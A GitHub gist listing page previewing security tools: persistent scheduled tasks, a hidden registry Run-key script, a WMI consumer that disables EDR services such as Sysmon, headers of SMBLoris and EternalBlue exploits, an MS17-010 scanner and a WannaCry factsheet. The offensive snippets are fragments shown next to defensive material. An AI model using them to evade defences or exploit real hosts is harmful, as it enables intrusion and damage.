Skip to content

Instantly share code, notes, and snippets.

View ion-storm's full-sized avatar

ionstorm ion-storm

245 followers · 172 following
View GitHub Profile
@gregjhogan
gregjhogan / always-running-scheduled-task.ps1
Created October 14, 2017 19:10
Windows scheduled task that stays running forever and restarts if it dies
$folder = "C:\folder"
$cmd = "powershell.exe "
$args = "-NoLogo -NonInteractive -WindowStyle Maximized -File script.ps1"
$user = "username-to-run-as"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).Date -RepetitionInterval (New-TimeSpan -Minutes 1)
$action = New-ScheduledTaskAction -WorkingDirectory $folder -Execute $cmd -Argument $args
$settings = New-ScheduledTaskSettingsSet -StartWhenAvailable -MultipleInstances IgnoreNew -RestartInterval (New-TimeSpan -Minutes 1) -RestartCount 999 -ExecutionTimeLimit (New-TimeSpan -Seconds 0)
$principal = New-ScheduledTaskPrincipal -UserId $user -LogonType Interactive
$task = New-ScheduledTask -Principal $principal -Action $action -Settings $settings -Trigger $trigger
@clong
clong / Native-Windows-Useragentss.txt
Created September 23, 2017 06:41
Native Windows UserAgents for Threat Hunting
Invoke-WebRequest:
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.1066
System.Net.WebClient.DownloadFile():
None
Start-BitsTransfer:
Microsoft BITS/7.8
certutil.exe:
@marcan
marcan / smbloris.c
Last active November 22, 2022 08:32
SMBLoris attack proof of concept
/* SMBLoris attack proof-of-concept
*
* Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
*
* Licensed under the terms of the 2-clause BSD license.
*
* This is a proof of concept of a publicly disclosed vulnerability.
* Please do not go around randomly DoSing people with it.
*
* Tips: do not use your local IP as source, or if you do, use iptables to block
@gboudreau
gboudreau / AuthyToOtherAuthenticator.md
Last active October 21, 2025 15:00 — forked from Ingramz/AuthyToOtherAuthenticator.md
Export TOTP tokens from Authy

Exporting your 2FA tokens from Authy to transfer them into another 2FA application

IMPORTANT - Update regarding deprecation of Authy desktop apps

Past August 2024, Authy stopped supported the desktop version of their apps:
See Authy is shutting down its desktop app | The 2FA app Authy will only be available on Android and iOS starting in August for details.

And indeed, after a while, Authy changed something in their backend which now prevents the old desktop app from logging in. If you are already logged in, then you are in luck, and you can follow the instructions below to export your tokens.

If you are not logged in anymore, but can find a backup of the necessary files, then restore those files, and re-install Authy 2.2.3 following the instructions below, and it should work as expected.

@brianreitz
brianreitz / PSReflect-RegHide.ps1
Created July 14, 2017 12:30
PowerShell script to hide a Run key like Reghide/Kovter/Poweliks
# requires PSReflect.ps1 to be in the same directory as this script
. .\PSReflect.ps1
$Module = New-InMemoryModule -ModuleName RegHide
# Define our structs.
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx
# typedef struct _UNICODE_STRING {
# USHORT Length;
# USHORT MaximumLength;
@mgeeky
mgeeky / openvas-automate.sh
Last active September 27, 2025 13:30
OpenVAS automation script.
#!/bin/bash
#
# OpenVAS automation script.
# Mariusz B. / mgeeky, '17
# v0.2
#
trap ctrl_c INT
# --- CONFIGURATION ---
@mgreen27
mgreen27 / EDR_Killer.ps1
Last active October 18, 2021 16:12
WMI EventConsumer to disable EDR (or other tools) tools when installed
# PowerShell 2.0
# Name: EDR_Killer.ps1
# Version: 1.0
# Author: @mgreen27
# Description: Powershell WMI Event Consumer Proof of Concept to disable EDR tools when installed.
# Original Template (Eventlog Consumer) attributed to @mattifestation: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a
# Set Variables
$Name = 'EDR_Killer'
$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 30 WHERE TargetInstance ISA "Win32_Service" AND (TargetInstance.Name = "Sysmon" OR TargetInstance.Name = "Service name 2" OR TargetInstance.Name = "Service Name ..." OR TargetInstance.Name = "Service name N")'
@worawit
worawit / eternalblue8_exploit.py
Last active March 16, 2024 18:38
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@iwikmai
iwikmai / Get-MS17010.ps1
Last active December 22, 2023 05:50
<#
.Synopsis
Scans a host or network for the MS17-010 vulnerability and output results as a
table that you can pipe to other PowerShell functions such as Invoke-Command or
Export-CSV.
.DESCRIPTION
This script will use a custom NMap NSE script to scan a destination host on
port 445 for the MS17-010 vulnerability. If the host is not online or is blocking
@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active May 14, 2025 19:15 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru